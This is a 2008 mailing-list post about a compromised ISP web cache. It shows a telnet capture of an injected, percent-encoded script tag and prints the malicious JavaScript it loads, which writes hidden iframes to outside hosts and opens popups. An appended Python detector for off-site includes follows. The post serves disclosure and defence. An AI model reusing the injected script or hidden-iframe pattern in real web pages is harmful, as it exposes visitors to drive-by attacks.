[General] FT Cache Compromise Details
Burhan Khalid
burhan at kuwaitnet.net
Thu Dec 4 16:41:37 +03 2008
I don't think I need to say this, but do not click on any links in this
email.
Salaam All:
Just as a reminder, as of this email date, the cache is still
compromised (see paste below).
[burhan at t61p ~]$ telnet google.com 80
Trying 72.14.205.100...
Connected to google.com.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.google.com
HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie:
PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/; domain=.google.com
<script language=javascript
src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
16e2
Apparently it's loading something from a Chinese website (58.53.128.82),
a JavaScript file, which does what normal such exploits do - loads in an
iframe content from another compromised site, and opens popups:
function Get(){
    // Expiry for the marker cookie: 40 minutes from now.
    var Then = new Date();
    Then.setTime(Then.getTime() + 1*40*60*1000);
    var cookieString = new String(document.cookie);
    var cookieHeader = "cainibi=";
    var beginPosition = cookieString.indexOf(cookieHeader);
    if (beginPosition != -1){
        // Marker cookie already set: nothing happens, so the hidden iframe
        // and the popup only fire once per 40-minute window.
    } else {
        document.cookie = "cainibi=chongxinzuo;expires="+ Then.toGMTString();
        // Hidden div holding a zero-size iframe that pulls in a second site.
        document.write("<div style=\"display:none\">");
        document.write("<iframe src=http://se.c66a.cn/ width=0 height=0></iframe>");
        // Popup window to a third site.
        window.open("http://liaobamm.com");
    }
}
// Zero-height iframe written on every page load, regardless of the cookie.
document.write("<iframe src=http://w.c66d.cn/logo.htm width=100 height=0></iframe>");
Get();
If anyone has an inside ear on FT, tell them to block access at their
firewall to the offending IPs. Hell, they block Skype, why can't they
block something I don't want.
Enjoy,
--
Burhan Khalid
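The injected tag above hides its hostname behind percent-encoding (%77%2E%63%36%36%64%2E%63%6E decodes to w.c66d.cn, the same host as the logo.htm iframe). A quick way to catch this kind of cache-side tampering is to fetch a page through the suspect cache and flag every script or iframe include whose decoded host is not the site you asked for. The following detector is an added example, not code from the original post or from FT; the sample response is constructed to match the paste above, and the trusted-suffix list (google.com) is an assumption for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the shape of the response shown in the post, with the
# injected <script> tag sitting ahead of the first chunk-size line ("16e2").
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=ISO-8859-1\r\n"
    b"\r\n"
    b"<script language=javascript "
    b"src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>\r\n"
    b"16e2\r\n"
    b"<html><head><title>Google</title></head><body></body></html>\r\n"
)

# Constructed clean response for comparison: only same-site includes.
CLEAN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><script src=\"https://www.google.com/x.js\"></script>"
    b"<script src=/local.js></script></head><body></body></html>\r\n"
)

# Match the src attribute of script and iframe tags; quotes are optional
# because the injected tag uses none.
SCRIPT_SRC = re.compile(rb"<script\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IFRAME_SRC = re.compile(rb"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def split_response(raw):
    """Split a raw HTTP response into (head, body) at the blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def decode_src(src_bytes):
    """Percent-decode a src value so a disguised hostname becomes readable."""
    return unquote(src_bytes.decode("latin-1"))


def host_of(url):
    """Hostname of an absolute URL, lower-cased; '' for relative URLs."""
    return (urlsplit(url).hostname or "").lower()


def is_trusted(host, trusted_suffixes):
    """True if host equals or is a subdomain of a trusted suffix."""
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def find_foreign_includes(raw, trusted_suffixes=("google.com",)):
    """Return script/iframe includes whose decoded host is off-site.

    Each finding records the tag kind, the raw attribute as it appeared,
    the decoded URL and host, and whether percent-encoding was used to
    disguise the host (a strong signal of injection on its own).
    """
    _, body = split_response(raw)
    findings = []
    for kind, pattern in (("script", SCRIPT_SRC), ("iframe", IFRAME_SRC)):
        for m in pattern.finditer(body):
            raw_src = m.group(1)
            url = decode_src(raw_src)
            host = host_of(url)
            if host and not is_trusted(host, trusted_suffixes):
                findings.append({
                    "kind": kind,
                    "raw": raw_src.decode("latin-1"),
                    "url": url,
                    "host": host,
                    "encoded_host": b"%" in raw_src.split(b"/", 3)[2]
                    if raw_src.count(b"/") >= 2 else False,
                })
    return findings


if __name__ == "__main__":
    for f in find_foreign_includes(SAMPLE_RESPONSE):
        print(f["kind"], f["raw"], "->", f["host"],
              "(percent-encoded host)" if f["encoded_host"] else "")
```

Run against a response captured with the same telnet session as in the post (save the raw bytes to a file and pass them to find_foreign_includes); a clean response from the cache yields an empty list, while the tampered one reports the off-site script with its decoded host.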